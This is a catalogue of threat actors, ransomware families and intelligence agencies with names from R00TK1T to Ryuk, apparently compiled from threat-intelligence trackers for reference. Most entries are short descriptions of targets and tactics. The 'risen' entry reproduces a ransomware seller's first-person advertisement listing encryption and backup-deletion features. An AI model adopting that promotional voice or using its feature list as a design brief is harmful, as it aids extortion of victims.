Ransomware
R00tK1T
R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.
R3store
ransomware
R980
Ransomware
Ra Group
Ra Group is an active extortion or ransomware group tracked by RansomLook.
Ra
ransomware
RAA encryptor
Ransomware Possible affiliation with Pony
Rabbit Hole
Rabbit Hole is an active extortion or ransomware group tracked by RansomLook.
RabbitFox
ransomware
Rabion
Ransomware RaaS Copy of Ranion RaaS
Radamant
Ransomware
Radar
Radar is an active extortion or ransomware group tracked by RansomLook.
Radiant Group
Radiant Group is an active extortion or ransomware group tracked by RansomLook.
RADIO PANDA
RADIO PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Ragnar Locker
Ragnar Locker is a ransomware identified in December 2019 that targetscorporate networks inBig Game Huntingtargeted attacks. This reportpresents recent elements regarding this ransomware.
Ragnarok
Ragnarok is is a ransomware that targetscorporate networks in Big Game Huntingtargeted attacks. The ransomware is associated with 'double-extortion' tactic, stealing and publishing files on a data leak site (DLS).
RaHDit
RaHDit is a pro-Kremlin hacktivist group known for orchestrating hack-and-leak operations, including the publication of personal information about Ukrainian military intelligence personnel and their associates. The group has been linked to Russian intelligence and has claimed to provide actionable intelligence to the Russian army. RaHDit operates a website called NemeZida, where they disclose sensitive data, and has been involved in disinformation campaigns supporting Russian narratives. Their activities include collaboration with other hacktivist groups and targeting Ukrainian cyberdefense efforts.
Rakhni
Ransomware Files might be partially encrypted
Ramp
Ramp is an active extortion or ransomware group tracked by RansomLook.
Ramsey
ransomware
Ramsomeer
Ransomware Based on the DUMB ransomware
Rancoz
Rancoz is an active extortion or ransomware group tracked by RansomLook.
Random30
ransomware
RandomLocker
ransomware
Ranion RaasRansomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ranion Raas gives the opportunity to regular people to buy and distribute ransomware for a very cheap price. (More info in the link below). RaaS service
Ranion
Ranion is an active ransomware-as-a-service operation tracked by RansomLook.
Rannoh
Ransomware
RanRan
Ransomware
RanRans
ransomware
Rans0mLocked
ransomware
Ransed
ransomware
Ransoc
Ransomware Doesn't encrypt user files
Ransom Corp
Ransom Corp is an active extortion or ransomware group tracked by RansomLook.
Ransom Prank
ransomware
Ransom102
ransomware
Ransom32
Ransomware no extension change, Javascript Ransomware
RansomAES
ransomware
Ransombay
Ransombay is an active extortion or ransomware group tracked by RansomLook.
RansomBlox
ransomware
Ransomcartel
Ransomcartel is an active extortion or ransomware group tracked by RansomLook.
Ransomcortex
Ransomcortex is an active extortion or ransomware group tracked by RansomLook.
RansomCuck
ransomware
ransomedvc2
RansomedVC2 aka RebornVC aka RansomedVC (rebrand) under new leadership.
RansomEXX
We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim’s name.
Ransomhouse Group
Ransomhouse is a sophisticated ransomware-as-a-service (RaaS) group that emerged in late 2021. The group employs double extortion tactics, first encrypting victim networks then threatening to publish exfiltrated data if ransom demands are not met. Ransomhouse operates a Tor-based leak site to name-and-shame non-paying victims. The group tries to portray a professional image, offering personalized Onion chat links for negotiation and advice to bolster victims' security. Technically, Ransomhouse utilizes specialized tools like Babuk ransomware, and its variant Mario ransomware. It uses MrAgent to automate ransomware deployment across large environments. The group has targeted entities worldwide, with a focus on Western industries like technology and industrials.[[Sogeti Global February 28 2024](/references/61b478d2-315c-4b94-8be2-4614003ece9f)][[Trellix RansomHouse February 14 2024](/references/47214846-49b2-44a1-a696-cca24d9caa56)]
RansomHouse
This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.
RansomHub Ransomware Actors
RansomHub is an extortion group that regularly republicizes victim data allegedly stolen in other ransomware groups' attacks, but it is also believed to have developed an original ransomware payload.[[BroadcomSW June 5 2024](/references/3fa49490-cb22-4362-bf48-eaba9e83e6f5)][[The Record RansomHub June 3 2024](/references/1e474240-bd12-4472-8e69-1631b0e4c102)] This object reflects the ATT&CK Techniques and/or associated Software & Campaigns linked to attacks by actors deploying RansomHub ransomware.
RansomHub
RansomHub is a dominant ransomware-as-a-service operation that emerged in 2024 and quickly became the most prolific group with 736 disclosed victims.
RansomLock
Ransomware Locks the desktop
RansomMine
ransomware
Ransomnix
ransomware
RansomPlus
Author of this ransomware is sergej. Ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.
RansomUserLocker
ransomware
RansomVC
Ransomed.VC burst onto the scene with a well-orchestrated PR campaign, encompassing a clearnet site and multiple communication channels including Telegram and Twitter/X profiles. Their operations are heavily inclined towards exploiting GDPR penalties as a method of extortion, threatening victims with potential legal repercussions in case of data leaks.
ransomware blog
Also known as MedusaLocker
RansomWarrior
ransomware
Ranzy
Ranzy is an active extortion or ransomware group tracked by RansomLook.
Rapid 2.0
ransomware
Rapid 3.0
ransomware
Rapid Action Battalion
Rapid Action Battalion – Intelligence Wing (RAB-IW)
Rapid-Gillette
ransomware
Rapid
ransomware
Rapture
Rapture is an active extortion or ransomware group tracked by RansomLook.
RaRuCrypt
ransomware
RarVault
Ransomware
Raspberry Typhoon
Microsoft has tracked Raspberry Typhoon (RADIUM) as the primary threat group targeting nations that ring the South China Sea. Raspberry Typhoon consistently targets government ministries, military entities, and corporate entities connected to critical infrastructure, particularly telecoms. Since January 2023, Raspberry Typhoon has been particularly persistent. When targeting government ministries or infrastructure, Raspberry Typhoon typically conducts intelligence collection and malware execution. In many countries, targets vary from defense and intelligence-related ministries to economic and trade-related ministries
RASPITE
Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.
RASTAKHIZ
Hidden Tear variant discovered in October 2016. After activation, provides victims with an unlimited amount of time to gather the requested ransom money and pay it. Related unlock keys and the response sent to and from a Gmail addres
RATPAK SPIDER
In July 2018, the source code of Pegasus, RATPAK SPIDER’s malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia’s financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.
Raznatovic
Raznatovic is an active extortion or ransomware group tracked by RansomLook.
RAZOR TIGER
An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.
Razor
Razor was discovered by dnwls0719, it is a part of Garrantydecrypt ransomware family. Like many other programs of this type, Razor is designed to encrypt files (make them unusable/inaccessible), change their filenames, create a ransom note and change victim's desktop wallpaper. Razor renames files by appending the ".razor" extension to their filenames. For example, it renames "1.jpg" to "1.jpg.razor", and so on. It creates a ransom note which is a text file named "#RECOVERY#.txt", this file contains instructions on how to contact Razor's developers (cyber criminals) and other details. As stated in the "#RECOVERY#.txt" file, this ransomware encrypts all files and information about how to purchase a decryption tool can be received by contacting Razor's developers. Victims supposed to contact them via razor2020@protonmail.ch, Jabber client (razor2020@jxmpp.jp) or ICQ client (@razor2020) and wait for further instructions. It is very likely that they will name a price of a decryption tool and/or key and provide cryptocurrency wallet's address that should be used to make a transaction. However, it is never a good idea to trust (pay) any cyber criminals/ransomware developers. It is common that they do not provide decryption tools even after a payment. Another problem is that ransomware-type programs encrypt files with strong encryption algorithms and their developers are the only ones who have tools that can decrypt files encrypted by their ransomware. In most cases victims have the only free and safe option: to restore files from a backup. Also, it is worth mentioning that files remain encrypted even after uninstallation of ransomware, its removal only prevents it from causing further encryptions.
Razy
Ransomware
Rebel Jackal
This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.
Reckless Rabbit
Reckless Rabbit lures victims into investment scams through malicious Facebook advertisements that lead to fake news articles with embedded web forms for personal information collection. They create domains using RDGA patterns, including random characters and English words, and configure wildcard DNS responses to obscure their active subdomains. The actor employs validation checks to filter out traffic from specific countries, enhancing their operational security. Their investment scam platforms often feature fake endorsements to increase credibility among potential victims.
Reconnaissance General Bureau
Reconnaissance General Bureau[21]
Rector
Ransomware
Red Alert
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Fake name: Microsoft Corporation. Based on HiddenTear
Red Charon
Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Due to these APT attacks having similar behavior profiles (similar adversarial techniques, tactics, and procedures or TTP) with each other and previously documented cyberattacks, CyCraft assess with high confidence these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they’ve seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019, CyCraft have dubbed Operation Skeleton Key.
Red Dev 17
In 2021, PwC started tracking a series of intrusions under the moniker of Red Dev 17 that they assess were highly likely conducted by a China-based threat actor. Their analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17's observed targets are mainly in India, and include the Indian military, a multinational India-based technology company, and a state energy company. They assess that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 is a user of the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. They identified capability and infrastructure links between Red Dev 17 and the threat actor they call Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot), and with ShadowPad C2 servers. At this time, they do not have sufficient evidence to directly link Red Dev 17 to any of these threat actors. However, They assess with realistic probability that Red Dev 17 operates within a cluster of threat actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.
Red-Lili
RED-LILI is an active threat actor that has been identified by Checkmarx SCS research team. They have been publishing malicious packages on NPM and PyPi platforms, and have recently automated the process of creating NPM users for package publication. The Checkmarx team has detected around 1500 malicious packages associated with RED-LILI and has continuously disclosed their findings to the respective security teams.
Red Menshen
Since 2021, Red Menshen, a China based threat actor, which has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education, and logistics sectors using a custom backdoor referred as BPFDoor. This threat actor uses a variety of tools in its post-exploitation phase. This includes custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open source tools like Mimikatz and Metasploit to aid in its lateral movement across Windows systems. Also, They have been seen sending commands to BPFDoor victims via Virtual Privat Servers (VPSs) hosted at a well-known provider, and that these VPSs, in turn, are administered via compromised routers based in Taiwan, which the threat actor uses as VPN tunnels. Most Red Menshen activity that has been observed took place between Monday to Friday (with none observed on the weekends), with most communication taking place between 01:00 and 10:00 UTC.131 This pattern suggests a consistent 8 to 9-hour activity window for the threat actor, with realistic probability of it aligning to local working hours.
Red Nue
Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAt backdoor, also known as ReverseWindow. LootRAT has variants for Windows and Macintosh (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue's victimology.
Red Ransomware
Red Ransomware is an active extortion or ransomware group tracked by RansomLook.
RedAlpha
Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan Community over the past two years. The campaigns, which we are collectively naming RedAlpha, combine light reconnaissance, selective targeting, and diverse malicious tooling. We discovered this activity as the result of pivoting off of a new malware sample observed targeting the Tibetan community based in India.
RedAnts Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
RedBoot
ransomware
RedDelta
Likely Chinese state-sponsored threat activity group RedDelta targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident through the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as throughout 2022 through the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine. During the 3-month period from September through November 2022, RedDelta has regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure. RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.
RedEye
Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives authors contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system.The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.
Redfly
Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.
RedFox
ransomware
RedGolf
Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.
RedJuliett
RedJuliett is a likely Chinese state-sponsored threat actor targeting government, academic, technology, and diplomatic organizations in Taiwan. They exploit vulnerabilities in network edge devices for initial access and use SQL injection and directory traversal exploits against web and SQL applications. The group operates from Fuzhou, China, and aims to support Beijing's intelligence collection on Taiwan's economic and diplomatic relations. RedJuliett has also expanded its operations to compromise organizations in other countries such as Hong Kong, Malaysia, and the United States.
Redkeeper
ransomware
RedKitten
RedKitten is a campaign targeting Iranian interests, particularly NGOs and individuals documenting human rights abuses, first observed in January 2026. The malware utilizes GitHub and Google Drive for configuration and payload retrieval, while employing Telegram for command and control. Although precise attribution is challenging, the activity exhibits TTPs associated with Iranian state-sponsored actors and linguistic indicators suggest a Farsi-speaking threat actor. RedKitten is characterized as an AI-accelerated campaign exploiting the humanitarian crisis surrounding Iran’s Dey 1404 protests.
RedRoman
ransomware
RedRum
ransomware
Redshot
ransomware
RedStinger
In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
Reetner
ransomware
REF2924
A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia.According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.
REF5961
Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.
REF7707
REF7707 is a cyber campaign targeting government entities, particularly a foreign ministry in South America, utilizing malware families such as FinalDraft, GuidLoader, and PathLoader for persistence and lateral movement. The threat actor employs the Microsoft Graph API for C2 communication, blending malicious traffic with legitimate activity to evade detection. Despite their technical sophistication, REF7707 operators exhibited poor operational security, leading to the exposure of their infrastructure and malware. Their tactics enable the extraction of sensitive data, including passwords and Active Directory information, facilitating ongoing espionage activities.
Regional Anti-Terrorist Structure
Regional Anti-Terrorist Structure (RATS)
RegretLocker
RegretLocker is a new ransomware that has been found in the wild in the last month that does not only encrypt normal files on disk like other ransomwares. When running, it will particularly search for VHD files, mount them using Windows Virtual Storage API, and then encrypt all the files it finds inside of those VHD files.
RekenSom
ransomware
RektLocker
Ransomware
Rektware
GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension
Relic
Relic is an active extortion or ransomware group tracked by RansomLook.
Relock
ransomware
RemindMe
Ransomware
RenameX12
ransomware
RenLocker Ransomware (FAKE)
It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files don’t actually get encrypted, their names get changed using this formula: [www-hash-part-]+[number]+[.crypter]
RensenWare
ransomware
Rentyr
ransomware
Republic of China Military Police
Military Police Command (ROCMP)
Research and Analysis Wing
Research and Analysis Wing (R&AW)
Research Division of the Prime Minister's Department
Malaysian External Intelligence Organisation (Foreign Intelligence)
RestoLocker
ransomware
ResumeLooters
Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to execute it on the administrators’ device to obtain admin credentials. While the group was able to execute the XSS script on some visitors’ devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential thefts.
Resurrection
ransomware
Retis
ransomware
RetMyData
ransomware
Returned Libra
Returned Libra, also known as 8220 Mining Group, is a cloud threat actor group that has been active since at least 2017. Tools commonly employed during their operations are PwnRig or DBUsed which are customized variants of the XMRig Monero mining software. The Returned Libra mining group is believed to have originated from a GitHub fork of the Rocke group's software. Returned Libra has elevated its mining operations with the use of cloud service platform credential scrapping.
Revenge Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoMix / CryptFile2 Variant
RevengeHotels
RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.
Reveton ransomware
A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.
REvil
REvil is a Russian ransomware-as-a-service operation that has targeted major corporations worldwide.
Revolution
ransomware
Reynolds
Reynolds is an active extortion or ransomware group tracked by RansomLook.
Reyptson
ransomware
RGB-TEAM
RGB-TEAM is a previously unknown Russian-speaking threat actor. They describe themselves as “a community of anonymous hacktivists fighting for freedom.” The group stated that it doesn’t have enemies in the U.S., Europe, “in the East, or in the West.”
Rhino
ransomware
Rhysida Ransomware Actors
This object represents the behaviors associated with operators of Rhysida ransomware, which is licensed on a ransomware-as-a-service ("RaaS") basis. Various affiliated ransomware operators likely do not operate as a cohesive unit. The Rhysida RaaS operation has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.[[HC3 Analyst Note Rhysida Ransomware August 2023](/references/3f6e2821-5073-4382-b5dd-08676eaa2240)] **Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]
rhysida
Rhysida is a ransomware-as-a-service (RAAS) group that emerged in May 2023. The group utilizes a namesake ransomware through phishing attacks and Cobalt Strike to breach the targets' networks and deploy their payloads. The group threatens to publicly distribute exfiltrated data if the ransom is not paid, and it's worth mentioning that Rhysida is still in the early stages of development. The ransomware leaves PDF notes in the affected folders, instructing victims to contact the group through its portal, and payment is made via Bitcoin. After encryption, the ransomware appends the extension ".ryshida" to encrypted files. For encryption purposes, Trend Micro published an analysis stating that the ransomware uses a 4096-bit RSA key and AES-CTR for encryption. In addition to the encryption method, Trend Micro published an analysis of the Ryshida Ransomware attack chain. Finally, the group has a website on the Tor network hosting the companies that have been breached.
RIDDLE SPIDER
According to Crowdstrike, RIDDLE SPIDER is the operator behind the avaddon ransomware
Rijndael
ransomware
RIP (Phoenix) Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear
RipperSec
RipperSec is a pro-Palestinian, likely Malaysian hacktivist group created in June 2023, known for conducting DDoS attacks, data breaches, and defacements primarily targeting government and educational websites, as well as organizations perceived to support Israel. The group has claimed 196 DDoS attacks, with a significant portion directed at Israel, and utilizes a tool called MegaMedusa for their operations. RipperSec operates on Telegram, where it has amassed over 2,000 members, and collaborates with various like-minded hacktivist groups. Their attack strategy relies heavily on community involvement rather than sophisticated infrastructure.
risen
Risen, which is a fully optimized and high-speed program, is the result of our years of experience in the field of malware writing. Risen is written in C language and completely using winapi. We produced many products with different features and options, but we came to the conclusion that none of the options have the benefit and efficiency they should; So, instead of spending time on useless and inefficient options, we decided to spend all our time on the strength, speed and security of our cryptography, and that's how we created Risen. Software features in version 1:
-Encryption security, utilizing Chacha20 and RSA 2048 algorithms.
-High encryption speed and software optimization
-compatible with all versions of Windows on any hardware without any issues.
-Automatic option settings, its easy to using and default configuration set to the best mode.
-Utilization of Threadpool method and queue creation for encryption.
-A powerful file unlocker, unlock files without closing processes.
-Safe deletion of backups, shadow copies, and all windows logs.
-A blog, Leak website, and management panel on TOR for leaking data of non-paying companies.
RNS
ransomware
Roaming Mantis
According to new research by Kaspersky's GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user's traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.
Roaming Tiger
Roaming Tiger is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Robbing Hood
Robbing Hood is an active extortion or ransomware group tracked by RansomLook.
RobinHood
Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrate data
Rocket Kitten
Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.
Roga
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker requests the ransom in Play Store cards. https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png
Rogue HT
ransomware
Rokku
Ransomware possibly related with Chimera
Romanian Intelligence Service
Romanian Intelligence Service (SRI) – Serviciul Român de Informații
RomCom
ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group's adaptability and growing sophistication.
Rontok
ransomware
Rook
Ransomware
Root
Root is an active extortion or ransomware group tracked by RansomLook.
RoshaLock
Ransomware Stores your files in a password protected RAR file
RotorCrypt(RotoCrypt, Tar) Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Royal Canadian Mounted Police
Royal Canadian Mounted Police (RCMP) Intelligence Division
Royal Ransomware Actors
Royal is a ransomware group believed to be responsible for hundreds of attacks on victims worldwide, including those in critical infrastructure sectors including manufacturing, communications, healthcare, and education. The actors that comprise the Royal ransomware operation are believed to be former members of other cybercriminal groups linked to Roy/Zeon ransomware, Conti ransomware, and TrickBot. Unlike many of the other most prominent ransomware groups in recent years, the developers of Royal ransomware are not known to lease the malware to affiliates as a service.[[Kroll Royal Deep Dive February 2023](/references/dcdcc965-56d0-58e6-996b-d8bd40916745)] The Royal group often pressures victims into paying ransom demands by threatening to leak data exfiltrated during intrusions. While public data from the [ransomwatch project](https://github.com/joshhighet/ransomwatch) suggest the group has claimed roughly 200 victims since Q4 2022, a November 2023 U.S. government advisory indicated that Royal “has targeted over 350 known victims worldwide” since September 2022, with extortion demands at times exceeding $250 million.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)][[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]
Royal
Royal is an active extortion or ransomware group tracked by RansomLook.
RozaLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Rozlok
ransomware
Rransom
Rransom is an active extortion or ransomware group tracked by RansomLook.
RSA-NI
ransomware
RSA2048Pro
ransomware
RSAUtil
RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.
Rtm Locker
Rtm Locker is an active extortion or ransomware group tracked by RansomLook.
Ruby Sleet
Ruby Sleet is a threat actor linked to North Korea's Ministry of State Security. Cerium has been involved in spear-phishing campaigns, compromising devices, and conducting cyberattacks alongside other North Korean threat actors. They have also targeted companies involved in COVID-19 research and vaccine development.
Ruby
ransomware
RUBYCARP
RUBYCARP is a financially-motivated threat actor group likely based in Romania, with a history of at least 10 years of activity. They operate a botnet using public exploits and brute force attacks, communicating via public and private IRC networks. RUBYCARP targets vulnerabilities in frameworks like Laravel and WordPress, as well as conducting phishing operations to steal financial assets. They use a variety of tools, including the Perl Shellbot, for post-exploitation activities and have a diverse set of illicit income streams.
Run Some Wares
Run Some Wares is an active extortion or ransomware group tracked by RansomLook.
RunExeMemory
ransomware
Runsomewere
Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background
Rush
ransomware
RuskiNet
RuskiNet is a pro-Russian hacktivist collective associated with disruptive operations including DDoS attacks, website defacements, phishing, and data leaks against government, infrastructure, financial, and civil targets.
Russenger
ransomware
Russian EDA2
ransomware
Russian Globe Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
RussianRoulette
Ransomware Variant of the Philadelphia ransomware
Rustylocker
Rustylocker is an active ransomware-as-a-service operation tracked by RansomLook.
Ruthless Rabbit
Ruthless Rabbit has been running investment scam campaigns since November 2022, primarily targeting users in Russia, Poland, Romania, and Kazakhstan. The actor utilizes RDGA patterns to create over 2,600 domains, hosted on multiple dedicated IPs, and employs a cloaking service for validation checks on user leads. Their campaigns have included themes such as Baltic Pipe financial scams and spoofing well-known platforms like WhatsApp and Google Finance. The most prevalent campaign theme involves a spoofed news article from "Channel One" promoting the "GazInvest" platform with promises of high returns.
Ruza Flood
Microsoft threat actor profile. Origin/Threat: Russia, Influence operations.
Ryuk ransomware
